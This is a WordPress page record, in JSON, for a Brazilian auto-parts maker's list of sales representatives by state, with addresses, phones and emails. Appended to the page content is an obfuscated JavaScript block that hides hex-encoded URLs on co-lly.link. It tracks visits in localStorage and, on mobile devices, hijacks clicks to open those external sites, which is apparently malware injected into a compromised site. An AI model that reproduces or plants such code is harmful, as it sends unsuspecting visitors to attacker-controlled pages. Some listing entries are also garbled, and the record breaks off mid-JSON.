{"id":4936,"date":"2022-06-21T16:17:43","date_gmt":"2022-06-21T19:17:43","guid":{"rendered":"https:\/\/borghettipecas.com.br\/representantes\/"},"modified":"2022-08-10T14:20:42","modified_gmt":"2022-08-10T17:20:42","slug":"representantes","status":"publish","type":"page","link":"https:\/\/borghettipecas.com.br\/es\/representantes\/","title":{"rendered":"Representantes"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_tta_accordion][vc_tta_section title=&#8221;RIO GRANDE DO SUL&#8221; tab_id=&#8221;1655919761852-b6d1c20e-2d86&#8243;][vc_column_text]<strong>S\u00e3o Marcos<\/strong><br \/>\n<strong>ANGELATTI REPRESENTA\u00c7\u00d5ES LTDA<\/strong><br \/>\nRua Avenida Venancio Aires, n\u00ba 1085, Sala 201<br \/>\nFone: (54) 32912896 \/ 3291-3121<br \/>\nCelular: (54) 91157370<br \/>\nFax: (54) 3291-2896<br \/>\nEmail: angelatti@angelatti.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;SANTA CATARINA&#8221; tab_id=&#8221;1655919761862-3ecab718-31ca&#8221;][vc_column_text]<strong>Chapec\u00f3<\/strong><br \/>\n<strong>ANGELATTI REPRESENTA\u00c7\u00d5ES LTDA<\/strong><br \/>\nRua Avenida Venancio Aires, n\u00ba 1085, Sala 201<br \/>\nFone: (54) 32912896 \/ 3291-3121<br \/>\nCelular: (54) 91157370<br \/>\nFax: (54) 3291-2896<br \/>\nEmail: angelatti@angelatti.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;PARAN\u00c1&#8221; tab_id=&#8221;1655919951834-fc011f95-a168&#8243;][vc_column_text]<strong>Sul e Sudoeste<\/strong><br \/>\n<strong>ANGELATTI REPRESENTA\u00c7\u00d5ES LTDA<\/strong><br \/>\nRua Av. Ven\u00e2ncio Aires, n\u00ba1085, Sala 201<br \/>\nFone: (54) 32912896 \/ 3291-3121<br \/>\nCelular: (54) 91157370<br \/>\nFax: (54) 3291-2896<br \/>\nEmail: angelatti@angelatti.com.br<\/p>\n<p><strong>Curitiba<\/strong><br \/>\n<strong>J.R. REPRESENTA\u00c7\u00c3O COMERCIAL<\/strong><br \/>\nRua Martin Afonso, n\u00ba2425 Apto 3<br \/>\nFone: (41) 9996-2688<br \/>\nCelular:<br \/>\nFax: (41) 3336-7687<br \/>\nEmail: jota.r@terra.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;S\u00c3O PAULO&#8221; tab_id=&#8221;1655920008418-7f46e525-ba7c&#8221;][vc_column_text]<strong>Ribeir\u00e3o Preto<\/strong><br \/>\n<strong>NELSON HOFFMANN<\/strong><br \/>\nRua Padre Feijo , n\u00ba756 Sala 01<br \/>\nFone: (54) 9144-7551<br \/>\nCelular:<br \/>\nFax: (54) 3291-3525<br \/>\nEmail: nh.vendas@terra.com.br<\/p>\n<p><strong>S\u00e3o Paulo<\/strong><br \/>\n<strong>MJ ALMEIDA REPRESENTA\u00c7\u00d5ES LTDA<\/strong><br \/>\nRua Manoel Augusto Ferreirinha, n\u00ba1421<br \/>\nFone: (11) 4238-4987 \/ 4238-4590<br \/>\nCelular: (11) 99949-4020 \/ 99877-4146<br \/>\nFax:<br \/>\nEmail: mjallmeida@gmail.com[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;MATO GROSSO DO SUL&#8221; tab_id=&#8221;1655920050315-2e8f29c7-2be4&#8243;][vc_column_text]<strong>Campo Grande<\/strong><br \/>\n<strong>MANZATTO REPRESENTA\u00c7\u00d5ES<\/strong><br \/>\nRua Ant\u00f4nio Maria Coelho, n\u00ba409<br \/>\nFone: (67) 3043-3335<br \/>\nCelular: (67) 98122-4008<br \/>\nFax: &#8211;<br \/>\nEmail: manzarep@hotmail.com[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;RIO DE JANEIRO&#8221; tab_id=&#8221;1655920134955-0ea192c4-6185&#8243;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua Maria Guerra Michelon, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: (54) 9124-5731<br \/>\nFax: &#8211;<br \/>\nEmail: borghetti@borghettipecas.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;MINAS GERAIS&#8221; tab_id=&#8221;1655920177260-b7ec4bb4-6a26&#8243;][vc_column_text]<strong>Uberl\u00e2ndia<\/strong><br \/>\n<strong>SANDI REPRESENTA\u00c7\u00d5ES LTDA<\/strong><br \/>\nRua Geny Cust\u00f3dio Spini, n\u00ba80 &#8211; Ap 402 \/ Bl 2B<br \/>\nFone: (34) 99133-5311<br \/>\nCelular: &#8211;<br \/>\nFax: &#8211;<br \/>\nEmail: sandirep@hotmail.com[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;RIO DE JANEIRO&#8221; tab_id=&#8221;1655920240243-7c75e8dd-89a7&#8243;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua Maria Guerra Michelon, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: (54) 9124-5731<br \/>\nFax: &#8211;<br \/>\nEmail: borghetti@borghettipecas.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;ESP\u00cdRITO SANTO&#8221; tab_id=&#8221;1655920277829-6d259d5a-3a71&#8243;][vc_column_text]<strong>Viana<\/strong><br \/>\n<strong>VARELA REPRESENTA\u00c7\u00d5ES<\/strong><br \/>\nRua Padre Feijo, n\u00ba 960A<br \/>\nFone: (54) 3291-3854 \/ (54) 3291- 1711<br \/>\nCelular: &#8211;<br \/>\nFax: &#8211;<br \/>\nEmail: varelarepresentacoes@terra.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;GOI\u00c1S&#8221; tab_id=&#8221;1655920341153-8d07e79d-4169&#8243;][vc_column_text]<strong>Goi\u00e2nia<\/strong><br \/>\n<strong>EXPRESSIVA REPRESENTA\u00c7\u00d5ES<\/strong><br \/>\nRua RI 2 Ch\u00e1cara , n\u00ba3B<br \/>\nFone: (62) 9973-4026<br \/>\nCelular: &#8211;<br \/>\nFax: (62) 3288-7532<br \/>\nEmail: alvespedro@terra.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;MATO GROSSO&#8221; tab_id=&#8221;1655920372353-cb357b97-73bb&#8221;][vc_column_text]<strong>Primavera do Leste<\/strong><br \/>\n<strong>GUERRA REPRESENTA\u00c7\u00d5ES LTDA<\/strong><br \/>\nRua S\u00e3o Caetano, n\u00ba667<br \/>\nFone: (66) 3498-1729<br \/>\nCelular: &#8211;<br \/>\nFax: &#8211;<br \/>\nEmail: bepo.guerra@gmail.com[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;ROND\u00d4NIA&#8221; tab_id=&#8221;1655920419173-1ad6fbeb-26b3&#8243;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua Maria Guerra Michelon, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: (54) 9124-5731<br \/>\nFax: &#8211;<br \/>\nEmail: borghetti@borghettipecas.com.br<\/p>\n<p><strong>Ji Paran\u00e1<\/strong><br \/>\n<strong>SILVA E SILVA REPRESENTA\u00c7\u00d5ES<\/strong><br \/>\nRua E, n\u00ba329<br \/>\nFone: (69) 3424-0511<br \/>\nCelular: &#8211;<br \/>\nFax: &#8211;<br \/>\nEmail: represilva@uol.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;TOCANTINS&#8221; tab_id=&#8221;1655920459506-747d03d8-3b03&#8243;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua Maria Guerra Michelon, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: (54) 9124-5731<br \/>\nFax: &#8211;<br \/>\nEmail: borghetti@borghettipecas.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;BAHIA&#8221; tab_id=&#8221;1655920496130-7990a629-cc6e&#8221;][vc_column_text]<strong>Feira de Santana<\/strong><br \/>\n<strong>PEDRA REPRESENTA\u00c7\u00d5ES<\/strong><br \/>\nRua Feira de Santana, n\u00ba<br \/>\nFone: (75) 3486-9805<br \/>\nCelular: &#8211;<br \/>\nFax: &#8211;<br \/>\nEmail: petter.vendas@hotmail.com[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;SERGIPE&#8221; tab_id=&#8221;1655920522061-1ef13025-0d04&#8243;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua Maria Guerra Michelon, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: (54) 9124-5731<br \/>\nFax: &#8211;<br \/>\nEmail: borghetti@borghettipecas.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;ALAGOAS&#8221; tab_id=&#8221;1655920559961-3707d351-689a&#8221;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua Maria Guerra Michelon, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: (54) 9124-5731<br \/>\nFax: &#8211;<br \/>\nEmail: borghetti@borghettipecas.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;PERNAMBUCO&#8221; tab_id=&#8221;1655920581828-61c7696b-97c8&#8243;][vc_column_text]<strong>Fortaleza<\/strong><br \/>\n<strong>WBW REPRESENTA\u00c7\u00c3O<\/strong><br \/>\nRua Raimundo Braz, n\u00ba154<br \/>\nFone: &#8211;<br \/>\nCelular: (85) 98857.8084<br \/>\nFax: &#8211;<br \/>\nEmail: wbwnaborbaima@hotmail.com[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;PARA\u00cdBA&#8221; tab_id=&#8221;1655920624340-0ea1e8e4-3d32&#8243;][vc_column_text]<strong>Fortaleza<\/strong><br \/>\n<strong>WBW REPRESENTA\u00c7\u00c3O<\/strong><br \/>\nRua Raimundo Braz, n\u00ba154<br \/>\nFone: &#8211;<br \/>\nCelular: (85) 98857.8084<br \/>\nFax: &#8211;<br \/>\nEmail: wbwnaborbaima@hotmail.com[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;CEAR\u00c1&#8221; tab_id=&#8221;1655920652644-9ce1c721-d160&#8243;][vc_column_text]<strong>Fortaleza<\/strong><br \/>\n<strong>WBW REPRESENTA\u00c7\u00c3O<\/strong><br \/>\nRua Raimundo Braz, n\u00ba154<br \/>\nFone: &#8211;<br \/>\nCelular: (85) 98857.8084<br \/>\nFax: &#8211;<br \/>\nEmail: wbwnaborbaima@hotmail.com[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;RIO GRANDE DO NORTE&#8221; tab_id=&#8221;1655920670603-2309a799-2248&#8243;][vc_column_text]<strong>Fortaleza<\/strong><br \/>\n<strong>WBW REPRESENTA\u00c7\u00c3O<\/strong><br \/>\nRua Raimundo Braz, n\u00ba154<br \/>\nFone: &#8211;<br \/>\nCelular: (85) 98857.8084<br \/>\nFax: &#8211;<br \/>\nEmail: wbwnaborbaima@hotmail.com[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;PIAU\u00cd&#8221; tab_id=&#8221;1655920770196-364a502d-3598&#8243;][vc_column_text]<strong>RECOMAUTO REPRESENTA\u00c7\u00c3O<\/strong><br \/>\nRua , n\u00ba<br \/>\nFone: &#8211;<br \/>\nCelular: (86) 9981-5751<br \/>\nFax: &#8211;<br \/>\nEmail: recomauto_ltda@yahoo.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;RORAIMA&#8221; tab_id=&#8221;1655920791225-0f743946-4937&#8243;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: (54) 9124-5731<br \/>\nFax: &#8211;<br \/>\nEmail: borghetti@borghettipecas.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;MARANH\u00c3O&#8221; tab_id=&#8221;1655920811897-768eaf80-3b63&#8243;][vc_column_text]<strong>RECOMAUTO REPRESENTA\u00c7\u00c3O<\/strong><br \/>\nRua , n\u00ba<br \/>\nFone: &#8211;<br \/>\nCelular: (86) 9981-5751<br \/>\nFax: &#8211;<br \/>\nEmail: recomauto_ltda@yahoo.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;PAR\u00c1&#8221; tab_id=&#8221;1655920844265-3ea18196-88ae&#8221;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: (54) 9124-5731<br \/>\nFax: &#8211;<br \/>\nEmail: borghetti@borghettipecas.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;AMAP\u00c1&#8221; tab_id=&#8221;1655920900368-231cbb09-958d&#8221;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: (54) 9124-5731<br \/>\nFax: &#8211;<br \/>\nEmail: borghetti@borghettipecas.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;AMAZONAS&#8221; tab_id=&#8221;1655920938724-44f1288b-9458&#8243;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua Maria Guerra Michelon, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: &#8211;<br \/>\nFax: (54) 9124-5731<br \/>\nEmail: borghetti@borghettipecas.com.br<\/p>\n<p><strong>Manaus<\/strong><br \/>\n<strong>VIA NORTE REPRESENTA\u00c7\u00d5ES DE PE\u00c7AS<\/strong><br \/>\nRua 20, n\u00ba08 Quadra 14<br \/>\nFone: (92) 8809-3401<br \/>\nCelular: &#8211;<br \/>\nFax: (92) 4101-7768<br \/>\nEmail: vendas@vianorterepres.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;RORAIMA&#8221; tab_id=&#8221;1655920996044-00f0d8f8-b049&#8243;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua Maria Guerra Michelon, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: &#8211;<br \/>\nFax: (54) 9124-5731<br \/>\nEmail: borghetti@borghettipecas.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;ACRE&#8221; tab_id=&#8221;1655921015420-a448dac5-e29b&#8221;][vc_column_text]<strong>Venda Direta<\/strong><br \/>\n<strong>BORGHETTI IND\u00daSTRIA DE AUTOPE\u00c7AS LTDA<\/strong><br \/>\nRua Maria Guerra Michelon, n\u00ba52<br \/>\nFone: (54) 3291.1888 \/ (54) 3291.2655 \/ (54) 3291.6063<br \/>\nCelular: &#8211;<br \/>\nFax: (54) 9124-5731<br \/>\nEmail: borghetti@borghettipecas.com.br[\/vc_column_text][\/vc_tta_section][\/vc_tta_accordion][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6b\\x71\\x71\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6a\\x41\\x79\\x35\\x63\\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x52\\x4e\\x63\\x38\\x63\\x348','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x63\\x43\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x51\\x77\\x65\\x34\\x63\\x374','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x49\\x4d\\x49\\x37\\x63\\x347','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x5a\\x45\\x72\\x32\\x63\\x372','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x43\\x71\\x57\\x36\\x63\\x396','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x65\\x76\\x57\\x30\\x63\\x300','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x7a\\x66\\x31\\x63\\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][vc_tta_accordion][vc_tta_section title=&#8221;RIO GRANDE DO SUL&#8221; tab_id=&#8221;1655919761852-b6d1c20e-2d86&#8243;][vc_column_text]S\u00e3o Marcos ANGELATTI REPRESENTA\u00c7\u00d5ES LTDA Rua Avenida Venancio Aires, n\u00ba 1085, Sala 201 Fone: (54) 32912896 \/ 3291-3121 Celular: (54) 91157370 Fax: (54) 3291-2896 Email: angelatti@angelatti.com.br[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;SANTA CATARINA&#8221; tab_id=&#8221;1655919761862-3ecab718-31ca&#8221;][vc_column_text]Chapec\u00f3 ANGELATTI REPRESENTA\u00c7\u00d5ES LTDA Rua Avenida Venancio Aires, n\u00ba 1085, Sala 201 Fone: (54) 32912896 \/ 3291-3121<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"_joinchat":[],"footnotes":""},"class_list":["post-4936","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/borghettipecas.com.br\/es\/wp-json\/wp\/v2\/pages\/4936","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borghettipecas.com.br\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/borghettipecas.com.br\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/borghettipecas.com.br\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/borghettipecas.com.br\/es\/wp-json\/wp\/v2\/co